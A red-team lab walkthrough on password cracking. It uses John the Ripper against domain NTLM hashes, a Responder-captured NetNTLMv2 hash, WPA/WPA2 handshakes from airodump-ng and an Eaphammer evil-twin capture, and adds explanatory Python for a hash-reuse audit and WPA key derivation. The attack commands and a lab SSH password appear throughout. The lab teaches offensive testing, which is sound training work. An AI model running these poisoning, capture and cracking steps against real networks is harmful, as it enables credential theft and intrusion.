L1160-Red Password Cracking

Lab Contents

Lab Overview

This lab is intended to give the student some experience with password cracking. The NTDS file the student gathered previously can be cracked, and one has also been provided.

Another set of hashes has been provided. These hashes are located in the Linux virtual machine under the /opt/JohnTheRipper/apt directory.

The provided hashes include a hash captured using Responder (NetNTLMv2). Two wireless network handshakes have been provided, one network was using a WPA PSK, the other a WPA2 PSK. The WPA2 key should take a moment longer to crack due to the nature of the hashing algorithm. Finally, a hash was captured from a user who submitted an authentication hash to an Evil Twin AP using Eaphammer.

The hashes provided for this lab are commonly discovered in network environments and in some cases are cracked for privilege escalation and lateral movement opportunities.

Lab Objectives

Use previously captured credential hashes with CrackMapExec to compromise an entire domain. Prepare credential hashes and crack them using John the Ripper.

NOTE: The lab is dependent on the completion of Lab L1150 steps 5 and 6 to procure password hashes.

L1150-Red Step 5: Passing the Hash to Domain PWNAGE (DCSync)
L1150-Red Step 6: Prepare Hashes for Password Cracking

To start this lab, complete L1150-Red Step 5 and Step 6 if you have not already.

Step One

NTLM Password Cracking (via Domain Dump)

In the previous lab, an SSH Console Session was initiated to 10.10.98.20. This lab can utilize that same session.

For reference, the connection information is presented below. For more information, see Lab L0330.

SSH: itadmin@10.10.98.20
Password: APTClass2021!

Getting Started with John The Ripper

Use the password cracking tool John the Ripper to crack passwords from the NTLM hashes.

The compiled version of "John Jumbo" is available on the course Linux VM. It will be useful in cracking everything available for this lab.

First, some housekeeping: we need a wordlist.

Bash Input

wget https://raw.githubusercontent.com/Relkci/BadBlood/master/AD_Users_Create/wordlist.txt -O /opt/wordlist.txt

Bash Output

root@localhost:/opt/JohnTheRipper/run# wget https://raw.githubusercontent.com/Relkci/BadBlood/master/AD_Users_Create/wordlist.txt -O /opt/wordlist.txt
--2021-02-01 21:11:32--  https://raw.githubusercontent.com/Relkci/BadBlood/master/AD_Users_Create/wordlist.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.192.133, 151.101.64.133, 151.101.0.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.192.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 31324 (31K) [text/plain]
Saving to: ‘/opt/wordlist.txt’

/opt/wordlist.txt   100%[===================>]  30.59K  --.-KB/s    in 0.001s

2021-02-01 21:11:32 (33.0 MB/s) - ‘/opt/wordlist.txt’ saved [31324/31324]

Cracking Passwords with John The Ripper

It is time to crack some passwords.

Bash Input

cd /opt/JohnTheRipper/run
./john --wordlist=/opt/wordlist.txt --format=NT --pot=/opt/john.pot /opt/CrackMapExec/cme-domain-Hashes

John the Ripper (should have) successfully cracked a bunch of passwords.

Another "cleartext" secret may be hiding in your AD too. Have you checked for the reversible encryption flag lately? Most modern NTDS extraction tools will check and reverse them on the way out.

Bash Input

cat /opt/CrackMapExec/domain-NTDS |grep -ai cleartext
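
As an added example that is not part of the lab or of John the Ripper, the Python below joins the NTDS dump with the john.pot file the crack above wrote and reports exposed accounts and hash reuse without ever handling a recovered plaintext; the dump and pot lines it embeds are constructed samples.

```python
"""Added example (not the lab's or John the Ripper's code): join the NTDS dump
with the john.pot written by the crack above and report which accounts have a
recovered or reversibly-encrypted password and which share an NT hash. The
dump and pot lines are constructed samples in the pwdump layout the lab uses."""
import re
from collections import defaultdict

# Constructed NTDS sample (domain\user:rid:lmhash:nthash:::); the CLEARTEXT
# line is the kind of entry the "grep -ai cleartext" above finds.
NTDS_DUMP = """\
APT\\alice:1105:aad3b435b51404eeaad3b435b51404ee:0cb6948805f797bf2a82807973b89537:::
APT\\bob:1106:aad3b435b51404eeaad3b435b51404ee:0cb6948805f797bf2a82807973b89537:::
APT\\carol:1107:aad3b435b51404eeaad3b435b51404ee:ffffffffffffffffffffffffffffffff:::
APT\\svc_backup:CLEARTEXT:Summer2021!
"""
# Constructed john.pot sample; --format=NT entries look like $NT$<hash>:<password>.
JOHN_POT = "$NT$0cb6948805f797bf2a82807973b89537:test\n"

POT_RE = re.compile(r"^\$NT\$([0-9a-f]{32}):", re.IGNORECASE)
DUMP_RE = re.compile(r"^([^:]+):\d+:[0-9a-f]{32}:([0-9a-f]{32}):::", re.IGNORECASE)
CLEAR_RE = re.compile(r"^([^:]+):CLEARTEXT:")

def load_cracked_hashes(pot_text):
    """Set of NT hashes John has cracked. The plaintexts are deliberately
    dropped: an audit report never needs to carry them."""
    return {m.group(1).lower() for m in map(POT_RE.match, pot_text.splitlines()) if m}

def audit(dump_text, pot_text):
    """Return (exposed, reuse): exposed maps account -> reason it is exposed;
    reuse maps an NT hash shared by several accounts -> those accounts."""
    cracked = load_cracked_hashes(pot_text)
    exposed, by_hash = {}, defaultdict(list)
    for line in dump_text.splitlines():
        m = CLEAR_RE.match(line)
        if m:                       # reversible encryption: no cracking needed
            exposed[m.group(1)] = "reversible-encryption"
            continue
        m = DUMP_RE.match(line)
        if not m:
            continue
        user, nthash = m.group(1), m.group(2).lower()
        by_hash[nthash].append(user)
        if nthash in cracked:
            exposed[user] = "cracked"
    reuse = {h: users for h, users in by_hash.items() if len(users) > 1}
    return exposed, reuse

if __name__ == "__main__":
    exposed, reuse = audit(NTDS_DUMP, JOHN_POT)
    print(exposed)
    print(reuse)
```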

Step Two

NetNTLMv2 Password Cracking

Bash Input

Responder is a valuable tool to test network protocol controls.

The following command was performed in a controlled environment and is being provided to demonstrate the ease of this attack. DO NOT RUN THIS COMMAND, SKIP TO THE HASH CRACKING SECTION.

python3 Responder.py -I eth0

Bash Input

John the Ripper (jtr) is a valuable tool to test the strength of passwords. The LLMNR attack netted us a user hash; let's see if we can crack the password from it.

First, take a look at the credential hash materials.

cat /opt/JohnTheRipper/apt/ntlmv2-hash.txt

Bash Input

Crack it!

cd /opt/JohnTheRipper/run
./john --wordlist=/opt/wordlist.txt --pot=/opt/john.pot /opt/JohnTheRipper/apt/ntlmv2-hash.txt

Step Three

Wireless PSK (TKIP) Cracking

Bash Input

WPA is still in use and relies on the Temporal Key Integrity Protocol (TKIP), which has several demonstrated weaknesses as a cipher. Let's grab the 4-way handshake and take a swing at the crack operation.

The following commands were performed in a controlled environment and are being provided to demonstrate the ease of this attack. DO NOT RUN THESE COMMANDS, SKIP TO THE HASH CRACKING SECTION.

airmon-ng check kill
airmon-ng start wlan1
airodump-ng wlan1mon --essid APTDemoWPA -c 6 -w TKIP-handshake

Bash Input

Let's assume that we used airodump-ng to create a .pcap file and captured a four-way handshake. We can then use John to extract the key material and attempt an offline crack.

cd /opt/JohnTheRipper/run
./wpapcap2john /opt/JohnTheRipper/apt/TKIP-handshake-01.cap > /opt/JohnTheRipper/apt/tkip-extract.txt

Bash Input

./john --wordlist=/opt/wordlist.txt --pot=/opt/wifi.pot /opt/JohnTheRipper/apt/tkip-extract.txt

Step Four

Wireless PSK (AES) Cracking

WPA2 is the most common way of protecting a wireless network with a pre-shared key (PSK).

Bash Input

The following commands were performed in a controlled environment and are being provided to demonstrate the ease of this attack. DO NOT RUN THESE COMMANDS, SKIP TO THE HASH CRACKING SECTION.

airmon-ng check kill
airmon-ng start wlan1
airodump-ng wlan1mon --essid APTDemoWPA2 -c 6 -w AES-handshake

Bash Input

Let's assume that we used airodump-ng to create a .pcap file and captured a four-way handshake. We can then use John to extract the key material and attempt an offline crack.

cd /opt/JohnTheRipper/run
./wpapcap2john /opt/JohnTheRipper/apt/AES-handshake-01.cap > /opt/JohnTheRipper/apt/aes-extract.txt

Bash Input

./john --wordlist=/opt/wordlist.txt --pot=/opt/wifi.pot /opt/JohnTheRipper/apt/aes-extract.txt

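As an added example that is not part of the lab or of John the Ripper, the Python below derives the WPA/WPA2 PMK the way a supplicant does, which is what makes every PSK guess in steps three and four expensive and why the ESSID acts as a salt. The ESSIDs are the lab's demo networks, the passphrase is constructed, and the "password"/"IEEE" value is the published IEEE 802.11i test vector.

```python
"""Added example (not the lab's or John the Ripper's code): derive the WPA/WPA2
PMK exactly as a supplicant does, to show why each PSK guess in steps three and
four costs thousands of HMAC-SHA1 calls and why the ESSID acts as a salt."""
import hashlib
import hmac

# Published IEEE 802.11i (Annex H) test vector: passphrase "password", SSID "IEEE".
IEEE_VECTOR_PMK = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"

def derive_pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, essid, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)

def pbkdf2_sha1_counted(password: bytes, salt: bytes, iterations: int, dklen: int):
    """Textbook PBKDF2 (RFC 2898) that also counts HMAC-SHA1 invocations, so the
    per-guess cost hidden inside hashlib becomes visible. Returns (key, calls)."""
    out, calls, block = b"", 0, 1
    while len(out) < dklen:
        u = hmac.new(password, salt + block.to_bytes(4, "big"), hashlib.sha1).digest()
        t, calls = bytearray(u), calls + 1
        for _ in range(iterations - 1):
            u = hmac.new(password, u, hashlib.sha1).digest()
            t = bytearray(a ^ b for a, b in zip(t, u))
            calls += 1
        out, block = out + bytes(t), block + 1
    return out[:dklen], calls

def hmac_calls_per_guess(essid: str) -> int:
    """HMAC-SHA1 calls to test one candidate passphrase for `essid`: 32 bytes of
    PMK need two 20-byte PBKDF2 blocks, so 2 x 4096 rather than a single hash."""
    return pbkdf2_sha1_counted(b"x", essid.encode(), 4096, 32)[1]

def matches_ieee_test_vector() -> bool:
    """Sanity check of derive_pmk against the standard's published vector."""
    return derive_pmk("password", "IEEE").hex() == IEEE_VECTOR_PMK

def pmk_depends_on_essid(passphrase: str, essid_a: str, essid_b: str) -> bool:
    """True when one passphrase gives different PMKs on two networks: a table
    precomputed for one ESSID is useless against another."""
    return derive_pmk(passphrase, essid_a) != derive_pmk(passphrase, essid_b)

if __name__ == "__main__":
    # Constructed passphrase; the ESSIDs are the lab's two demo networks.
    print("IEEE vector ok:", matches_ieee_test_vector())
    print("HMAC-SHA1 calls per guess:", hmac_calls_per_guess("APTDemoWPA2"))
    print("ESSID salts the PMK:", pmk_depends_on_essid("CorrectHorse", "APTDemoWPA", "APTDemoWPA2"))
```

Contrast this with the NT format cracked in step one, which costs a single unsalted hash per guess and is why the domain hashes fell so quickly.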
Step Five

Wireless User Attacks and Cracks

RADIUS-backed (802.1X) networks are another option for wireless security, and in some people's opinion the most secure one: the station and the network negotiate per-session encryption keys that are rotated almost continuously, so there is no shared PSK to crack. In this case, we attack the user.

Bash Input

Eaphammer is a great tool for this attack.

The following command was performed in a controlled environment and is being provided to demonstrate the ease of this attack. DO NOT RUN THIS COMMAND, SKIP TO THE HASH CRACKING SECTION.

./eaphammer -i wlan1 --channel 6 --auth wpa-eap --essid APTDot1X --creds

Bash Input

Many tools do not produce usable or crackable material as-is. Review the evil-twin AP attack and the Eaphammer output from the previous screenshot and from the next command: the text contains the important component parts, but it is not crackable in that form.

cat /opt/JohnTheRipper/apt/dot1x-hashes.txt

Bash Input

cat /opt/JohnTheRipper/apt/dot1x-hashes.txt |grep jtr |tr -s ' ' |cut -d " " -f4 > /opt/JohnTheRipper/apt/dot1x-hash ; cat /opt/JohnTheRipper/apt/dot1x-hash

Bash Input

Next up on the crack list is the wireless user's NetNTLM hash.

./john --wordlist=/opt/wordlist.txt --pot=/opt/john.pot /opt/JohnTheRipper/apt/dot1x-hash

This completes this lab. Continue on to L1160-Blue.

Lab Complete